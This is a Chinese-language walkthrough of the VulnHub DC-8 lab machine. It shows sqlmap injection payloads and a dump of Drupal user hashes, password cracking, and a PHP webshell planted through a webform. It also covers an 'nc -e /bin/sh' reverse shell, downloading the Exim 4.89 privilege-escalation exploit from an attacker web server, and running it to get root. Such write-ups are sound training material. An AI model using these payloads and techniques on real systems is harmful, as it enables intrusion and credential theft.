vulnhub-DC-8

信息收集

还是nmap扫一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─# nmap -A -p1-65535 192.168.20.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 18:46 CST
Nmap scan report for 192.168.20.138
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:1B:50:44 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.32 ms 192.168.20.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.49 seconds

sql注入

看看80端口的服务,发现还是drupal,但是这次公开的漏洞还是没利用成功,应该是打补丁的,当把鼠标光标靠近蓝字时发现这次访问是用的get传参,那么很可能是sql注入,用sqlmap跑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sqlmap -u "http://192.168.20.138/?nid=1"
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=1 AND 5944=5944

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=1 AND (SELECT 3337 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(3337=3337,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=1 AND (SELECT 5434 FROM (SELECT(SLEEP(5)))wqBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-9850 UNION ALL SELECT CONCAT(0x7178766b71,0x564868785a6f6e56754157534e7a534e6b6e49534c53534e494474764256526f586f597369476c79,0x71786b7171)-- -
---

确实是sql注入,直接拿用户数据

1
2
3
4
5
6
7
8
9
sqlmap -u "http://192.168.20.138/?nid=1" -D d7db -T users -C name,mail,pass --dump --batch

+--------+-----------------------+---------------------------------------------------------+
| name   | mail                  | pass                                                    |
+--------+-----------------------+---------------------------------------------------------+
| admin  | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | john@blahsdfsfd.org   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+-----------------------+---------------------------------------------------------+

很明显john就是提示要利用这个工具爆破密码

1
john 1.txt

爆出来是turtle,但是没看到登录页面,就是把首页换了,但是前面几个靶机知道这个框架的登录目录就是在/user/login,直接登录

登录后我原本想像之前一样直接写马子访问,发现不解析php,插件也传不了,翻了半天发现contact up页面中的webform中的formsetting支持php,那就直接写个马子 ,要注意一定要确认消息中写点消息,不然解析不成功

可以蚁剑连接弹个shell

1
2
3
nc -e /bin/sh 192.168.20.138 1111

nc -lvvp 1111

exim提权

要提权,还是老套路,直接先看suid和sudo,这里看到有exim

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

还是exim4,猜测有漏洞,看看版本

1
2
exim --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07

查漏洞库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
└─# searchsploit exim 4                                                                       
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution                                                            | linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit)                                                          | linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)                                                            | linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution                                                                            | linux/remote/25970.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                            | linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow                                                                    | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails                                                                        | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation                                                                                   | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote                                                                                   | linux/remote/812.c
Exim 4.63 - Remote Command Execution                                                                                     | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation                                                                                 | linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation                                                                            | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                                                               | linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                                                               | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution                                                                    | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service                                                                                     | multiple/dos/43184.txt
exim 4.90 - Remote Code Execution                                                                                        | linux/remote/45671.py
Exim < 4.86.2 - Local Privilege Escalation                                                                               | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                                                          | linux/remote/44571.py
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service                                                                  | linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String                                                                      | linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun                                                              | linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)                                                  | linux/remote/16925.rb
MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow                                                                     | linux/dos/23896.txt
OpenBSD 3.3 - 'Semget()' Integer Overflow (1)                                                                            | openbsd/local/23046.c
OpenBSD 3.3 - 'Semget()' Integer Overflow (2)                                                                            | openbsd/local/23047.c
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                                 | php/webapps/42221.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

想直接利用4.89版本漏洞的,但是没有直接利用的脚本,这里看到有4.87 - 4.91 的利用脚本,那就用这个脚本

1
2
3
4
5
6
7
8
下载下来:
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp

搭建python web服务
python3 -m http.server 80

下载
www-data@dc-8:/tmp$ wget http://192.168.20.129/46996.sh

这个脚本有两个利用方法

1
2
./46996.sh -m setuid
./46996.sh -m netcat

第一个没提权成功,第二个成功了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 25 Nov 2024 23:35:17 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1tFZFF-0000HX-Gz
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
root@dc-8:/var/spool/exim4# ls

至此靶机攻克

总结

这个靶机还是很老套,并且比较简单,可能找php解析哪里难找一点,提权过于简单了,知识点:sql注入、exim提权